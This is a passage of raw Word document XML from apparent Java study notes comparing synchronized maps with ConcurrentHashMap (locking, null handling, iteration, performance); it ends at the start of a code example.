      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashTable</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only in legacy code or where low concurrency is expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA046F8"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modern, multi-threaded applications</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that require high performance and </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>safe concurrent access</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CF6A24" w14:textId="77777777" w:rsidR="005420DA" w:rsidRPr="005420DA" w:rsidRDefault="005420DA" w:rsidP="005420DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de facto standard</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for concurrent map operations in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FD265" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="29EE873C">
          <v:rect id="_x0000_i3941" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4745ED" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc197867405"/>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between SynchronizedHashMap and ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="24937A69" w14:textId="32B78A3D" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="00751B6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference between SynchronizedHashMap and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gridCol w:w="4876"/>
        <w:gridCol w:w="3694"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="6FFD69F4" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48CBD89F"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F423ABB"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3AD3F226" w14:textId="77777777" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="005D0612">
            <w:pPr>
              <w:jc w:val="center"/>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5A40539F" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D6A0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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE335A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Thread-safe (using Collections.synchronizedMap() wrapper around a HashMap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A8D4FE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Thread-safe (uses fine-grained locking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="36A250EA" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D4E5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ocking Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="327F2C0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Locks </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>the entire map</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for every operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53C7E4D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segment-based locking</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (locks only a part of the map)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="2D6D166A" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C06E7D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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FF8095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Slower due to </w:t>
            </w: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on every operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="698BA60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Faster due to </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>concurrent access</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (multiple threads can read/write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="387EFD1C" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D01990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Null Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5157938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Allows </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one null key</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multiple null values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C4806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Does </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>not allow</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> null keys or values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="26D936CC" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AC0E12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Concurrency Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="548A880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Low (entire map locked for every operation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6191864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High (fine-grained locking allows higher concurrency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="091235AE" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7618044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ion Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12680AC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il-fast (throws ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C72542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does not throw exception during iteration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="21A02B00" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA216D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ntroduced In</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5752627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Java 1.2 (part of the Collections framework)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E9913F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Java 1.5 (part of </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>java.util.concurrent</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> package)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="4BF8914F" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="189E55E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Data Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D531E0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Internally uses </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HashMap</w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B467A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Internally uses </w:t>
            </w:r>
            <w:r w:rsidRPr="00D96848">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>segment-based hash table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96848" w:rsidRPr="00D96848" w14:paraId="7E31A9F3" w14:textId="77777777" w:rsidTr="00D96848">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19EB6D4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lastRenderedPageBreak/>
              <w:t>Recommended Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77CBEDA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uitable for moderate concurrency scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6568BD4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Preferred for high-concurrency environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5251BDB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pict w14:anchorId="0BA58D3F">
          <v:rect id="_x0000_i7419" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E83228"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1. Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8FB19"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p w14:paraId="7125F4B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Achieved by wrapping a regular HashMap using Collections.synchronizedMap(new HashMap&lt;&gt;()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A6D2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Every method is synchronized, meaning it </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>locks the entire map</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for both reading and writing, even for read operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA1EF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The entire map is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>locked</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during each operation, reducing concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E11F5A7"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p w14:paraId="0209C17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segment-based locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (locking specific parts or "buckets" of the map), allowing more efficient concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4EC14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Operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not require a lock, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations acquire a lock only for the specific bucket being modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27588CB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The map is divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00D96848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing threads to access different segments concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C335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pict w14:anchorId="69285C76">
          <v:rect id="_x0000_i7420" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB1E32"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2. Code Example: SynchronizedHashMap vs ConcurrentHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF252D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mport java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54609A1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mport java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903F644" w14:textId="77777777" w:rsidR="00D96848" w:rsidRPr="00D96848" w:rsidRDefault="00D96848" w:rsidP="00D96848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480B51F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public class SynchronizedHashMapVsConcurrentHashMap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555351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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E2BFE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SynchronizedHashMap</w:t>
      </w:r>
    </w:p>
